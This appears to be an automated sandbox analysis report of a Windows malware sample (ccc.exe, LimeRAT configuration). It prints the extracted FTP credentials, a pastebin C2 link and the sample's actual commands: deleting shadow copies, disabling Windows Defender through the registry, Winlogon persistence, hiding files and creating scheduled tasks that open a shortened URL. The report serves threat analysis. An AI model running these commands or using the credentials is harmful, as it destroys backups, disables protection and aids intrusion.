Analysis
-
max time kernel
164s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
18-06-2024 20:57
Behavioral task
behavioral1
Sample
ccc.exe
Resource
win10v2004-20240611-en
General
-
Target
ccc.exe
-
Size
239KB
-
MD5
161cd662c124f1408ccbd57a752a8d5f
-
SHA1
7baad97316f0cbf1b35d9b0b2b3a8d19da852d41
-
SHA256
61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e
-
SHA512
ea72216157d4d502febc230700f4fd4279d7aab469a3b44cbafc99730df9431cbb9f64d0ab3e9d239a4faa869aa055a06198622b07a1f0408cfebdc9e23b20ac
-
SSDEEP
6144:UCoE/UVPy/oCa+LDZWC9z5UNbbH5knq1diOJN:PozPygCa+DZMGnq1c8
Malware Config
Extracted
Protocol: ftp- Host:
ftp.encompossoftware.com - Port:
21 - Username:
remoteuser - Password:
Encomposx99
Extracted
limerat
False
-
aes_key
1
-
antivm
false
-
c2_url
https://pastebin.com/Fe5fxpeZ
-
download_payload
false
-
install
true
-
install_name
svchost.exe
-
main_folder
True
-
payload_url
True
-
pin_spread
true
-
sub_folder
False
-
usb_spread
false
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/3336-1-0x0000019D64BA0000-0x0000019D64BE2000-memory.dmp disable_win_def behavioral1/files/0x000400000001da7a-25.dat disable_win_def -
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\"" ccc.exe Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\"" svchost.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection ccc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ccc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ccc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ccc.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" ccc.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation ccc.exe -
Executes dropped EXE 1 IoCs
pid Process 984 svchost.exe -
Enumerates connected drives 3 TTPs 15 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
flow ioc 75 pastebin.com 101 pastebin.com 106 pastebin.com 112 pastebin.com 72 pastebin.com 76 pastebin.com 77 pastebin.com 90 pastebin.com 94 pastebin.com 67 pastebin.com 98 pastebin.com 100 pastebin.com 29 pastebin.com 109 pastebin.com 118 pastebin.com 122 pastebin.com 64 pastebin.com 88 pastebin.com 93 pastebin.com 96 pastebin.com 97 pastebin.com 121 pastebin.com 18 iplogger.org 57 pastebin.com 83 pastebin.com 58 pastebin.com 79 pastebin.com 95 pastebin.com 99 pastebin.com 92 pastebin.com 107 pastebin.com 111 pastebin.com 123 pastebin.com 124 pastebin.com 125 pastebin.com 60 pastebin.com 73 pastebin.com 84 pastebin.com 110 pastebin.com 115 pastebin.com 126 pastebin.com 59 pastebin.com 68 pastebin.com 70 pastebin.com 86 pastebin.com 74 pastebin.com 91 pastebin.com 104 pastebin.com 102 pastebin.com 30 pastebin.com 56 pastebin.com 69 pastebin.com 71 pastebin.com 78 pastebin.com 80 pastebin.com 85 pastebin.com 103 pastebin.com 120 pastebin.com 17 iplogger.org 81 pastebin.com 82 pastebin.com 89 pastebin.com 61 pastebin.com 65 pastebin.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
pid Process 4644 cmd.exe 3680 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 3 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4796 vssadmin.exe 1528 vssadmin.exe 2768 vssadmin.exe 896 vssadmin.exe 4676 vssadmin.exe 2004 vssadmin.exe 2196 vssadmin.exe 2060 vssadmin.exe 1176 vssadmin.exe 740 vssadmin.exe 4036 vssadmin.exe 3860 vssadmin.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5044 schtasks.exe 2428 schtasks.exe 2320 schtasks.exe 3748 schtasks.exe 4520 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3336 ccc.exe 3336 ccc.exe 3336 ccc.exe 2420 powershell.exe 2420 powershell.exe 984 svchost.exe 984 svchost.exe 984 svchost.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 3336 ccc.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeBackupPrivilege 2400 vssvc.exe Token: SeRestorePrivilege 2400 vssvc.exe Token: SeAuditPrivilege 2400 vssvc.exe Token: SeBackupPrivilege 3336 ccc.exe Token: SeSecurityPrivilege 3336 ccc.exe Token: SeBackupPrivilege 3336 ccc.exe Token: SeDebugPrivilege 984 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3336 wrote to memory of 4644 3336 ccc.exe 85 PID 3336 wrote to memory of 4644 3336 ccc.exe 85 PID 4644 wrote to memory of 2764 4644 cmd.exe 87 PID 4644 wrote to memory of 2764 4644 cmd.exe 87 PID 4644 wrote to memory of 744 4644 cmd.exe 88 PID 4644 wrote to memory of 744 4644 cmd.exe 88 PID 3336 wrote to memory of 2420 3336 ccc.exe 89 PID 3336 wrote to memory of 2420 3336 ccc.exe 89 PID 3336 wrote to memory of 2016 3336 ccc.exe 91 PID 3336 wrote to memory of 2016 3336 ccc.exe 91 PID 3336 wrote to memory of 1200 3336 ccc.exe 92 PID 3336 wrote to memory of 1200 3336 ccc.exe 92 PID 3336 wrote to memory of 5020 3336 ccc.exe 93 PID 3336 wrote to memory of 5020 3336 ccc.exe 93 PID 3336 wrote to memory of 4920 3336 ccc.exe 94 PID 3336 wrote to memory of 4920 3336 ccc.exe 94 PID 3336 wrote to memory of 4116 3336 ccc.exe 95 PID 3336 wrote to memory of 4116 3336 ccc.exe 95 PID 3336 wrote to memory of 4656 3336 ccc.exe 96 PID 3336 wrote to memory of 4656 3336 ccc.exe 96 PID 3336 wrote to memory of 972 3336 ccc.exe 97 PID 3336 wrote to memory of 972 3336 ccc.exe 97 PID 3336 wrote to memory of 4228 3336 ccc.exe 98 PID 3336 wrote to memory of 4228 3336 ccc.exe 98 PID 3336 wrote to memory of 1608 3336 ccc.exe 99 PID 3336 wrote to memory of 1608 3336 ccc.exe 99 PID 3336 wrote to memory of 2924 3336 ccc.exe 100 PID 3336 wrote to memory of 2924 3336 ccc.exe 100 PID 3336 wrote to memory of 4368 3336 ccc.exe 101 PID 3336 wrote to memory of 4368 3336 ccc.exe 101 PID 3336 wrote to memory of 4896 3336 ccc.exe 102 PID 3336 wrote to memory of 4896 3336 ccc.exe 102 PID 3336 wrote to memory of 5100 3336 ccc.exe 103 PID 3336 wrote to memory of 5100 3336 ccc.exe 103 PID 1608 wrote to memory of 2060 1608 cmd.exe 117 PID 1608 wrote to memory of 2060 1608 cmd.exe 117 PID 2016 wrote to memory of 1528 2016 cmd.exe 118 PID 2016 wrote to memory of 1528 2016 cmd.exe 118 PID 4116 wrote to memory of 4796 4116 cmd.exe 119 PID 4116 wrote to memory of 4796 4116 cmd.exe 119 PID 4920 wrote to memory of 4676 4920 cmd.exe 120 PID 4920 wrote to memory of 4676 4920 cmd.exe 120 PID 4896 wrote to memory of 2196 4896 cmd.exe 121 PID 4896 wrote to memory of 2196 4896 cmd.exe 121 PID 5100 wrote to memory of 2004 5100 cmd.exe 122 PID 5100 wrote to memory of 2004 5100 cmd.exe 122 PID 972 wrote to memory of 1176 972 cmd.exe 123 PID 972 wrote to memory of 1176 972 cmd.exe 123 PID 4368 wrote to memory of 2768 4368 cmd.exe 125 PID 4368 wrote to memory of 2768 4368 cmd.exe 125 PID 1200 wrote to memory of 2736 1200 cmd.exe 126 PID 1200 wrote to memory of 2736 1200 cmd.exe 126 PID 2924 wrote to memory of 3860 2924 cmd.exe 128 PID 2924 wrote to memory of 3860 2924 cmd.exe 128 PID 4228 wrote to memory of 896 4228 cmd.exe 127 PID 4228 wrote to memory of 896 4228 cmd.exe 127 PID 5020 wrote to memory of 4036 5020 cmd.exe 129 PID 5020 wrote to memory of 4036 5020 cmd.exe 129 PID 4656 wrote to memory of 740 4656 cmd.exe 130 PID 4656 wrote to memory of 740 4656 cmd.exe 130 PID 3336 wrote to memory of 3748 3336 ccc.exe 132 PID 3336 wrote to memory of 3748 3336 ccc.exe 132 PID 3336 wrote to memory of 2320 3336 ccc.exe 133 PID 3336 wrote to memory of 2320 3336 ccc.exe 133 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 2764 attrib.exe 744 attrib.exe 2832 attrib.exe 2120 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ccc.exe"C:\Users\Admin\AppData\Local\Temp\ccc.exe"1⤵
- Modifies WinLogon for persistence
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"3⤵
- Views/modifies file attributes
PID:2764
-
-
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D3⤵
- Views/modifies file attributes
PID:744
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1528
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\system32\vssadmin.exevssadmin resize shadow /for=c: /on=c: /maxsize=401MB3⤵PID:2736
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4036
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4676
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4796
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:740
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1176
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:896
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2060
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3860
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2768
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2196
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c Vssadmin delete shadowstorage /all /quiet2⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\system32\vssadmin.exeVssadmin delete shadowstorage /all /quiet3⤵
- Interacts with shadow copies
PID:2004
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "06:39" /sc daily /mo "2" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3748
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "07:55" /sc daily /mo "4" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2320
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "17:29" /sc daily /mo "5" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4520
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "15:00" /sc weekly /mo "3" /d "Tue" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2428
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "06:57" /sc monthly /m "may" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5044
-
-
C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984 -
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D3⤵
- Hide Artifacts: Hidden Files and Directories
PID:3680 -
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"4⤵
- Views/modifies file attributes
PID:2832
-
-
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D4⤵
- Views/modifies file attributes
PID:2120
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify Tools
2Indicator Removal
2File Deletion
2Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
239KB
MD5161cd662c124f1408ccbd57a752a8d5f
SHA17baad97316f0cbf1b35d9b0b2b3a8d19da852d41
SHA25661c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e
SHA512ea72216157d4d502febc230700f4fd4279d7aab469a3b44cbafc99730df9431cbb9f64d0ab3e9d239a4faa869aa055a06198622b07a1f0408cfebdc9e23b20ac